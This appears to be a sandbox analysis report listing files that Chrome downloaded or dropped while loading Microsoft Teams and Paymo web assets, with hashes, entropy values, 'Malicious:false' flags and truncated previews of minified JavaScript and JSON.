                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[502994],{863344:(t,e,n)=>{"use strict";n.d(e,{N:()=>s,ZP:()=>u,KB:()=>a});var r=n(795800),i={},o={};function a(t,e){var n=c(t,e);return i[n]}function s(t,e,r,a){var s=c(e,a),u=i[s];if(u&&!r)return Promise.resolve(u);var l=o[s];if(l&&!r)return l;if(!t)return Promise.reject("Missing bootstrapper config");var d=n.e(336689).then(n.bind(n,538774)).then((function(e){return e.initialize(t).then((function(t){return i[s]=t,t}))}));return o[s]=d,d}function u(t,e){var n=c(t,e);delete i[n],delete o[n]}function c(t,e){var n;return[(0,r.Et)(t),null===(n=null==e?void 0:e.getCacheKeySuffix)||void 0===n?void 0:n.call(e)].join("_")}},795800:(t,e,n)=>{"use strict";function r(t,e){var n=e||{};return[t,n.userAadObjectId,n.tenantAadObjectId].join("-")}function i(t){return r("Cortex.TopicsCapabilities",t)}function o(t){return r("Cortex.TopicsSdks",t)}n.d(e,{et:()=>r,MP:()=>i,Et:()=>o})},897604:(t,e,n)=>{"use st
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (29023)
                                Category:downloaded
                                Size (bytes):29128
                                Entropy (8bit):5.5730044734015305
                                Encrypted:false
                                SSDEEP:
                                MD5:7E044AB4B512045FB41758E79FF154C8
                                SHA1:4D1E0B07E606608460B6CA2141A772431A1CAD87
                                SHA-256:1AF56B2FBB95A6DFFC43CC598F7D0CD39CAEEC7D9C172936867568743799B951
                                SHA-512:28BBB85FE605C332469AECEBECC880C6D13C579B6297457271E0890789572D2C2A699B69BEB6E82CE090486669E94FC8837F8B354DA0C7E329F20FE70F821F35
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/693-bce9adbf9f09ae94.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[693],{805809:(e,t,n)=>{"use strict";var i,a;n.d(t,{p:()=>i,f:()=>a}),function(e){e.ActiveDirectoryGroupService="ActiveDirectoryGroupService",e.AiInsightsFeedbackService="AiInsightsFeedbackService",e.AppService="appservice",e.AppStudio="appstudio",e.AMS="asyncMediaService",e.AtpSafelinksService="atpSafelinksService",e.Attendee="attendee",e.AllFiles="allFiles",e.Auth="auth",e.Badger="badger",e.BRB="brb",e.CDN="cdn",e.CallingConversationService="callingConversationService",e.ChannelNotificationSettings="channelNotificationSettings",e.CognitiveService="cognitiveService",e.ChatService="chatservice",e.CMDArtifactsService="cmdArtifactsService",e.CmdMeetingIntelligenceService="cmdMeetingIntelligenceService",e.CMDServices="cmdServices",e.CNS="cns",e.CollabCloudService="collabCloudService",e.CSA="csa",e.CustomEmoji="customEmoji",e.CXCS="cxcs",e.DynamicsMarketing="dynamicsMarketing",e.DynamicsVirtua
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (41594)
                                Category:dropped
                                Size (bytes):41712
                                Entropy (8bit):5.29491411540647
                                Encrypted:false
                                SSDEEP:
                                MD5:F9D05C5CD421E615E84AA0595ACAA352
                                SHA1:DD1975343D52A1565C4BAFEF306729040FEA1C9B
                                SHA-256:B75C9801EC0811E358FFC023B1644C416F99808033F551F71E5E948FF785A5B1
                                SHA-512:AFD2EE8C0C3C5A7E688ACAA757881DD1F7912E63E6C95EA013CDE33F22956CD09B8811FD3432472ACA1C370BCB69B83420C651A040492E73157A3B69375A7BA4
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[412417],{975021:(e,t,n)=>{n.d(t,{$3:()=>s,or:()=>c,I6:()=>f,Xx:()=>d,Ui:()=>p,gk:()=>h,iJ:()=>v,T9:()=>m,d1:()=>y,mv:()=>g,cy:()=>b});var r=n(850734),i=n(813801),o=n(613995),a=n(401385),u=n(597309),s=Object.prototype.hasOwnProperty;function c(e,t){var n=e.__typename,r=e.id,i=e._id;if("string"==typeof n&&(t&&(t.keyObject=void 0!==r?{id:r}:void 0!==i?{_id:i}:void 0),void 0===r&&(r=i),void 0!==r))return"".concat(n,":").concat("number"==typeof r||"string"==typeof r?r:JSON.stringify(r))}var l={dataIdFromObject:c,addTypename:!0,resultCaching:!0,canonizeResults:!1};function f(e){return(0,r.o)(l,e)}function d(e){var t=e.canonizeResults;return void 0===t?l.canonizeResults:t}function p(e,t){return(0,i.A_)(t)?e.get(t.__ref,"__typename"):t&&t.__typename}var h=/^[_a-z][_0-9a-z]*/i;function v(e){var t=e.match(h);return t?t[0]:e}function m(e,t,n){return!!(0,o.U)(t)&&(b(t)?t.every((function(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (18459)
                                Category:dropped
                                Size (bytes):18567
                                Entropy (8bit):5.392203233495941
                                Encrypted:false
                                SSDEEP:
                                MD5:F1E2E125B6A655A912A2732F8DD84774
                                SHA1:19F8C0FC642A97EDD95E7A4623CF81221E2DFDA1
                                SHA-256:F3AE7ECE0106D467F5664C8865AF069E73CBB617BDEC69AE925DF65C516C3E7F
                                SHA-512:92ECB71EC56F834B32B49DC3B45CFF1E5345C32C7919B0BB6B602A55B62B1E5A2669F13CF220233B29A2E646D2CC0E1E85237542ECA3DF01CA03C5148C725C40
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[196395],{692934:(e,n,t)=>{t.d(n,{J4:()=>c,Dl:()=>h,On:()=>m,As:()=>C,Fd:()=>s,L2:()=>p,Oi:()=>v,oU:()=>d,ge:()=>f,wI:()=>I,PX:()=>w,X4:()=>l,kL:()=>g,qP:()=>u});var a=t(938510),r="locale",i="ver",o="name",s=(0,a.o)({UserExt:[0,"user"],DeviceExt:[1,"device"],TraceExt:[2,"trace"],WebExt:[3,"web"],AppExt:[4,"app"],OSExt:[5,"os"],SdkExt:[6,"sdk"],IntWebExt:[7,"intweb"],UtcExt:[8,"utc"],LocExt:[9,"loc"],CloudExt:[10,"cloud"],DtExt:[11,"dt"]}),c=(0,a.o)({id:[0,"id"],ver:[1,i],appName:[2,o],locale:[3,r],expId:[4,"expId"],env:[5,"env"]}),u=(0,a.o)({domain:[0,"domain"],browser:[1,"browser"],browserVer:[2,"browserVer"],screenRes:[3,"screenRes"],userConsent:[4,"userConsent"],consentDetails:[5,"consentDetails"]}),l=(0,a.o)({locale:[0,r],localId:[1,"localId"],id:[2,"id"]}),d=(0,a.o)({osName:[0,o],ver:[1,i]}),f=(0,a.o)({ver:[0,i],seq:[1,"seq"],installId:[2,"installId"],epoch:[3,"epoch"]}),
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):545272
                                Entropy (8bit):5.262263354720842
                                Encrypted:false
                                SSDEEP:
                                MD5:9134B5678799A501B8B97AAF92F63387
                                SHA1:9C9DA5A849506D5CCEA2BF0334680B40C07017D9
                                SHA-256:CB39974B85C38817BCA655C969E85AA49EFF2AA22A525C44082A8DB48C856000
                                SHA-512:188A3DA8AB85790AFCADC53B80FDC503CD9132708FF867E428BB5D69DF06BAEC99F9E5A7534230868949C587FC014A1C7596490213ADA5DE6EDCD97D53F66EC5
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[443192],{840432:(e,t,n)=>{"use strict";n.d(t,{H:()=>Ea});var r=n(329806),i=n(795317);function o(e){if(!e)throw new Error("Invariant violation")}function a(...e){throw new Error("Unexpected member of typed union: \n"+JSON.stringify(e))}function s(e,t,n){const r=e.get(t);void 0===r?e.set(t,[n]):r.push(n)}function u(e,t,n){let r=e.get(t);return void 0===r&&(r=n(),e.set(t,r)),r}var l=n(132786),c=0,f=1,d=2,p=3,h=4,v=5,g=6,y=7,_=8,m=n(193272),b=Object.defineProperty,E=Object.defineProperties,R=Object.getOwnPropertyDescriptors,S=Object.getOwnPropertySymbols,w=Object.prototype.hasOwnProperty,O=Object.prototype.propertyIsEnumerable,k=(e,t,n)=>t in e?b(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,I={kind:"Field",name:{kind:"Name",value:"__typename"}};function A(e){return"Field"===e.kind}var D=Object.assign((function(e){return(0,m.YR)(e,{SelectionSet:{enter(e,t,n){if(n&&"Operation
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (762)
                                Category:downloaded
                                Size (bytes):870
                                Entropy (8bit):5.301211793639726
                                Encrypted:false
                                SSDEEP:
                                MD5:F12EA2701724109C363A74AF2EA3EA39
                                SHA1:DA31AFBF27568A376C8BE1B792C9372B31C2C4E9
                                SHA-256:0D8398F412E8E9C50053E27370BBFCC05728D5661835987D3838171434A602D8
                                SHA-512:BB5963F801DF116F9AB20799365BABF10C864CF14E1A82C1E9DD03C8C2364F4D6819598B7BB0D7191DE2D0D94137980CF6DF05079416373E66B55D733CF72CD4
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/718583-24621dda8c5747d2.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[718583],{718583:(e,a,t)=>{t.d(a,{Z:()=>i});var s=t(513432),c=t(395225),l=t.n(c),n=t(485529),r=t(829289),i=(0,n.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:a.svg},s.createElement("path",{className:l()(r.Q.outline,a.outlinePart),d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("g",{className:l()(r.Q.filled,a.filledPart)},s.createElement("path",{d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("circle",{cx:"8",cy:"8",r:"5"})))},displayName:"RadioButtonIcon"})}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.map
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65531)
                                Category:downloaded
                                Size (bytes):73319
                                Entropy (8bit):6.023931210134822
                                Encrypted:false
                                SSDEEP:
                                MD5:9BA6BF7A463A9AD429FCF19C4E2187F9
                                SHA1:7C1D33381B74CD0402943BB4D6F13E1371E238CB
                                SHA-256:1BD1A5B5A1270BDCA55F8176A93814A67F3446F03E15F052D1EC8E4779CB6462
                                SHA-512:737A875BE4621E18E2CC741471DDA80E42263FF95B19D49BBC6582EE357ED07AC6CA74697654DD673AA4ACBAB9ED49D13DB0DD3243DAE6BC7FCAF2812D6477F5
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.google.com/async/ddljson?async=ntp:2
                                Preview:)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz+krP/iqj/sNz/tOL8m8r+ZXbZivzci/r/Mi3/eJD/hKH/nNX8W2n/NTL8XWzbjP4P/Oj9ODb6XXn/My/5OTjCZXX4WnW2WW8D++H7S3T+TF/7NDHWVH38ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+oAy+UAnen+50r97Fj+6lD961k0hvgsg/stg/pdZ14A8f8A2PH/6Uv97Vb/7U/+7VIvgfctg/sH9tD95kv+6k/ZzFRmV1QA/sX85EqHg1qmlUj33UIHpUkBrEgFp0x6dFUAI+Nzfolwe3KQnbBdWVxeX1+xTk+z/+Gdx86s4ez88WiJTU1pbmqEoKW05/qk9NG16PwBsUav/N4axCkQfj16UU91KXqNQJgVgUAFsWg/PM37vhB7VG37uQ/8wA7+uwH5vxGen3r7gNb/gtrZi//7vRCw/eDVsStAqOw3jfnz+p0+rO7ld9xEo+rbi/7TavjVffPNL/2cTa6nbsrbi/6eXbIyh/tqjvpvjf7+Tay1qFNxivx1kP9Tif2Vj
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                Category:downloaded
                                Size (bytes):97849
                                Entropy (8bit):5.49386796124279
                                Encrypted:false
                                SSDEEP:
                                MD5:41E2972A4DED74ECCB214740E70A8281
                                SHA1:1444C2790FA392C28F882F92FD4C3476ADCD92BE
                                SHA-256:8282CA02E1299653AE62135917BD57591958C7662F688B60FA24506EA16BE2C9
                                SHA-512:D59C488BD5CA6472146D1FBEE71DA33DFF55B480D3C0D4A50654D8555A2B0B846FB1066277795363A7B55D0CA6A729BDB9EA00CE7369B2F329FFD4D22F841894
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/47330-e2a167f3c69f0c2c.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[47330],{156054:(e,t,n)=>{n.d(t,{j:()=>b});var r=n(340415),i=n(344411),a=n(680828),o=n(779497),s=n(179233),u=n(661187),l=n(679080),c=n(943085),f=["ACCDA","ACCDB","ACCDC","ACCDE","ACCDR","ACCDT","ACCDU","ACCDW","ACCFT","ADE","ADN","ADP","AVI","BMP","CSV","DOC","DOCX","DOT","DOTX","ERR","FON","GIF","HTML","ISO","JPEG","JPG","LACCDB","LDB","LOG","MAD","MAF","MAG","MAM","MAQ","MAR","MAS","MAT","MAU","MAV","MAW","MDA","MDBHTML","MDE","MDN","MDT","MDW","MOV","MP3","MPD","MPG","MPP","MPT","MPW","MPX","MSG","OLS","ONE","ONEPKG","ONETOC","ONETOC2","OST","PDF","PNG","POT","POTHTML","POTX","PPA","PPS","PPSX","PPT","PPTHTML","PPTMHTML","PPTX","PPTXML","PST","PUB","PWZ","RTF","SLDM","SLDX","SLK","THMX","TIF","TIFF","TSX","TTF","TXT","VDW","VDX","VHD","VSD","VSDM","VSDX","VSIX","VSL","VSS","VSSM","VSSX","VST","VSTM","VSTX","VSU","VSW","VSX","WAV","WIZHTML","WMA","WMV","WPL","XLS","XLSHTML",
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):71331
                                Entropy (8bit):4.3735714624398625
                                Encrypted:false
                                SSDEEP:
                                MD5:2D397C60A3F6D5F4F77AF5ADE73BDAE3
                                SHA1:0408DF6B9E7A1BB292EA9426CFA160B3C19F7500
                                SHA-256:91DA53C692B4389ADF7BB5E7B17C1B6D42A3BEE56E76D26B0E2CA1D022E5B5A9
                                SHA-512:A27A1E6021459EBB477C9A1D7C36212BAC4D956A5FAE20A6BD58A19BA933C20DBE03AB0E19EB2DD1F03513D4ED16617A538836CF7E87FE9D9D7D5DFC738A6802
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[786989],{786989:(a,l,Z)=>{Z.d(l,{PWb:()=>c,B2b:()=>e,CQn:()=>m,w9k:()=>v,IAD:()=>M,o01:()=>H,nKv:()=>V,F6M:()=>A,xgG:()=>i,dZd:()=>t,HNx:()=>r,dZw:()=>U,xyI:()=>L,xV4:()=>d,b3q:()=>u,zcm:()=>g,OBm:()=>s,caN:()=>R,LSV:()=>T,dOY:()=>o,VPN:()=>F,PJ4:()=>n,k36:()=>C,yKF:()=>S,Qnz:()=>b,slQ:()=>x,gbh:()=>f,yqm:()=>p,TL:()=>k,b2m:()=>B,Zyz:()=>q,n4W:()=>P,$gc:()=>O,zrg:()=>w,Y8E:()=>W,ooj:()=>y,YyX:()=>z,CT4:()=>D,$A0:()=>_,bbI:()=>E,Brd:()=>$,bbB:()=>K,sVv:()=>N,uwv:()=>Q,dwb:()=>I,Hqt:()=>Y,exC:()=>J,qbk:()=>X,hO5:()=>j,tnW:()=>G,gu4:()=>aa,U0q:()=>la,qHH:()=>Za,uVS:()=>ha,aUd:()=>ca,ucc:()=>ea,Km0:()=>ma,mkh:()=>va,QbX:()=>Ma,_uv:()=>Ha,leE:()=>Va,vCx:()=>Aa,oA2:()=>ia,y3C:()=>ta,msU:()=>ra,GU8:()=>Ua,Dqj:()=>La,TXo:()=>da,_Vv:()=>ua,MqR:()=>ga,rqr:()=>sa,FeF:()=>Ra,dv:()=>Ta,$ZY:()=>oa,CfS:()=>Fa,unC:()=>na,d9o:()=>Ca,lQL:()=>Sa,Ozu:()=>ba,EyP:()=>xa,z49:()=>fa,cP8:()=>pa,gDx:(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (31325)
                                Category:downloaded
                                Size (bytes):31431
                                Entropy (8bit):5.399135626691903
                                Encrypted:false
                                SSDEEP:
                                MD5:96117FF359F7BB74C8E029A8DE7A0418
                                SHA1:78491116F2639C9BA250FFBF22BF575C6FFE8260
                                SHA-256:35A9D6F5CCB83F45FC664044E841FC7D3CA0859984D57C32D7CCF33E02763815
                                SHA-512:335AF97209D9DBA5281FFDFC30673946948D88974FF90F8533356DB491F3ED20EC4C6350577ABDF88A105011434913E33792231855D0FBD173246EEE6D25130C
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/main-77fbafbde8768a32.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[138792],{51304:()=>{!function(){var e=["user-blocking","user-visible","background"];class r{constructor(){this.channel_=new MessageChannel,this.sendPort_=this.channel_.port2,this.messages_={},this.nextMessageHandle_=1,this.channel_.port1.onmessage=e=>this.onMessageReceived_(e)}queueCallback(e){var r=this.nextMessageHandle_++;return this.messages_[r]=e,this.sendPort_.postMessage(r),r}cancelCallback(e){delete this.messages_[e]}onMessageReceived_(e){var r=e.data;if(r in this.messages_){var t=this.messages_[r];delete this.messages_[r],t()}}}function t(){return t.instance_||(t.instance_=new r),t.instance_}class i{constructor(e,r,t){void 0===t&&(t=0),this.callback_=e,this.callbackType_=null,this.handle_=null,this.canceled_=!1,this.schedule_(r,t)}isIdleCallback(){return 0===this.callbackType_}cancel(){if(!this.canceled_)switch(this.canceled_=!0,this.callbackType_){case 0:cancelIdleCallback(this.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (28291)
                                Category:downloaded
                                Size (bytes):28399
                                Entropy (8bit):5.326616207965685
                                Encrypted:false
                                SSDEEP:
                                MD5:8C1C0AFCA40BE8D07416F3805585624B
                                SHA1:27C48E1BB6618B9046EEEDF5D98763FA42F0E371
                                SHA-256:F614C28E24FF941A79923399511189CEDD7CA01CA9F460C506D6CD8D64DB7BE9
                                SHA-512:DC2F6C45726EF7349650FCC01E954EFD018F05614FF4454040A96AE41D3AC421DEB49E45B5F88246E3543D9FDBAAC7BC3138A229287228AECD9812C778C1C459
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/209929-95fdc8ec21fd6b75.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[209929],{598166:(t,e,n)=>{"use strict";function r(t){return t.split("-")[1]}function i(t){return"y"===t?"height":"width"}function o(t){return t.split("-")[0]}function a(t){return["top","bottom"].includes(o(t))?"x":"y"}function s(t,e,n){let{reference:s,floating:l}=t;const c=s.x+s.width/2-l.width/2,f=s.y+s.height/2-l.height/2,u=a(e),d=i(u),p=s[d]/2-l[d]/2,h="x"===u;let g;switch(o(e)){case"top":g={x:c,y:s.y-l.height};break;case"bottom":g={x:c,y:s.y+s.height};break;case"right":g={x:s.x+s.width,y:f};break;case"left":g={x:s.x-l.width,y:f};break;default:g={x:s.x,y:s.y}}switch(r(e)){case"start":g[u]-=p*(n&&h?-1:1);break;case"end":g[u]+=p*(n&&h?-1:1)}return g}n.d(e,{UE:()=>g,rD:()=>l,__:()=>u,UU:()=>b,jD:()=>I,ER:()=>L,cY:()=>k,B1:()=>f,BN:()=>E,Ej:()=>B});const l=async(t,e,n)=>{const{placement:r="bottom",strategy:i="absolute",middleware:o=[],platform:a}=n,l=o.filter(Boolean),c=await(null==a.isRTL
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (21452)
                                Category:downloaded
                                Size (bytes):237963
                                Entropy (8bit):5.26761897709741
                                Encrypted:false
                                SSDEEP:
                                MD5:1079C6AD388B243480DC592872CEDB03
                                SHA1:125BDC984F759F8623013DA314EE4D1B12CD2C28
                                SHA-256:0B5202068B12C82EA912081FF23954F84AF2FDF87514970FAC4C00B565B8EFE6
                                SHA-512:70C4221D50610715CAEC857126B9167865D3D0B1A27107EAAE509E79A9D50F860CE86DC9CACE68E4ADD715E145D67D09FBE0140BF9FBE637559B1C2F926EC431
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/system/apollo.js
                                Preview:System.register(["../tslib.es6-3ac6cc9f.js","../_commonjsHelpers-6226bf47.js","react"],function(L,mf){"use strict";var oe,d,K,ne,we,Se,ei,ti;return{setters:[ge=>{oe=ge.a,d=ge._,K=ge.b,ne=ge.c,we=ge.d,Se=ge.e},ge=>{ei=ge.a},ge=>{ti=ge.default}],execute:function(){function ge(t,e){for(var r=0;r<e.length;r++){const n=e[r];if(typeof n!="string"&&!Array.isArray(n)){for(const i in n)if(i!=="default"&&!(i in t)){const a=Object.getOwnPropertyDescriptor(n,i);a&&Object.defineProperty(t,i,a.get?a:{enumerable:!0,get:()=>n[i]})}}}return Object.freeze(Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}))}L({createClient:pf,createQueryPreloader:$l,defaultDataIdFromObject:yn,disableExperimentalFragmentVariables:yo,disableFragmentWarnings:po,enableExperimentalFragmentVariables:vo,fromError:Be,fromPromise:ec,getApolloContext:ut,getMainDefinition:Ze,gql:st,isApolloError:cn,isNetworkRequestSettled:Gc,isReference:W,makeReference:je,makeVar:Ba,mergeOptions:Ne,onError:Co,operationName:Pn,parseAndChec
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):326151
                                Entropy (8bit):5.071998687525131
                                Encrypted:false
                                SSDEEP:
                                MD5:F6381AB85F8A1415B6611E6B5B3216F9
                                SHA1:A98FFEF8FD054720D257DC676FBDF3D2D7B84471
                                SHA-256:C60AE71551DFECBA8CA8D7C7A05EC33B9F3C0EDD166F99A27C92CC0BC70156E2
                                SHA-512:EC2B5287A6EB1EDD52127DD49C4C976432CD8845669877D2C4C8DCF5C15894207769ED1AD0CF401113287F707A9187342A0082504A7A1782FF82441C086B324D
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/runtime-2d557ec41254cae5.js
                                Preview:(()=>{"use strict";var e,a,c,l,s,o,d,r,t,f,b,n,i,g,m,p={},h={};function u(e){var a=h[e];if(void 0!==a)return a.exports;var c=h[e]={id:e,loaded:!1,exports:{}};return p[e].call(c.exports,c,c.exports,u),h[e]&&u.ff&&delete p[e],c.loaded=!0,c.exports}u.m=p,u.c=h,u.ff=(()=>{try{return!JSON.parse(decodeURIComponent(document.head.getAttribute("data-config")))?.sidecars?.disableWebpackMemoryOptimization}catch{return!1}})(),u.amdO={},e="function"==typeof Symbol?Symbol("webpack then"):"__webpack_then__",a="function"==typeof Symbol?Symbol("webpack exports"):"__webpack_exports__",c=e=>{e&&(e.forEach((e=>e.r--)),e.forEach((e=>e.r--?e.r++:e())))},l=e=>! --e.r&&e(),s=(e,a)=>e?e.push(a):l(a),u.a=(o,d,r)=>{var t,f,b,n=r&&[],i=o.exports,g=!0,m=!1,p=(a,c,l)=>{m||(m=!0,c.r+=a.length,a.map(((a,s)=>a[e](c,l))),m=!1)},h=new Promise(((e,a)=>{b=a,f=()=>(e(i),c(n),n=0)}));h[a]=i,h[e]=(e,a)=>{if(g)return l(e);t&&p(t,e,a),s(n,e),h.catch(a)},o.exports=h,d((o=>{if(!o)return f();var d,r;t=(o=>o.map((o=>{if(null!==o&&
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):236701
                                Entropy (8bit):4.830125364503612
                                Encrypted:false
                                SSDEEP:
                                MD5:3BA740493DDA6B456C5BC8F5344A114E
                                SHA1:2C56A5E8A2367BF2CD7374FD557CE27FBD2503E1
                                SHA-256:9CD75E86D2ED7A65D165E04FD60C24A5D4E94F4B68A1A9644D20D931922E2D4E
                                SHA-512:74BB225A40EF55920280A1CCF9939829B241AFB60C94D25AEF28914D181AD8EDFCAD55C1D21310C4D61D091EA28638ACE83A3C55B92B7C795A3AD9A241CD45B1
                                Malicious:false
                                Reputation:unknown
                                Preview:{" A new payment will be added.":" A new payment will be added."," All payments will be deleted.":" All payments will be deleted."," are selected.":" are selected."," days":" days"," hrs":" hrs"," started a discussion on ":" started a discussion on ","\"From\" Email":"\"From\" Email","\"From\" Name":"\"From\" Name","({0} days late)":"({0} days late)","(48 hours before due)":"(48 hours before due)","(in {0} day)":"(in {0} day)","(in {0} days)":"(in {0} days)","(No title)":"(No title)","{0} active users":"{0} active users","{0} application is not active!":"{0} application is not active!","{0} application is not enabled":"{0} application is not enabled","{0} couldn't be uploaded. {1}":"{0} couldn't be uploaded. {1}","{0} invoices/month":"{0} invoices/month","{count} Bulk Entry":"{count} Bulk Entry","{count} Bulk Entry_plural":"{count} Bulk Entry","{count} clients":"{count} clients","{count} clients_plural":"{count} clients","{count} day":"{count} day","{count} day_plural":"{count} days","
                                No static file info